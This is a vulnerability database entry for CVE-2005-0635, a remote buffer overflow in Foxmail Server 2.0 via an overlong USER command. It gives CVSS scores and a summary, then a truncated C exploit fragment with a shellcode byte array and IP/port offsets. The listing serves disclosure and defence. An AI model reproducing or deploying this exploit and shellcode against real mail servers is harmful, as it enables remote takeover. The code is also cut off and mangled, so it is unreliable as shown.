10
CVSSv2

CVE-2005-0635

Published: 02/05/2005 Updated: 05/09/2008
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in Foxmail Server 2.0 allows remote malicious users to execute arbitrary code via a long USER command.

Vulnerable Product Search on Vulmon Subscribe to Product

foxmail foxmail email server 2.0

Exploits

#include <winsockh> #include <windowsh> #include <stdioh> #include <conioh> #pragma comment (lib,"ws2_32") #define PORT_OFFSET 118 #define IP_OFFSET 111 char Shellcode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" ...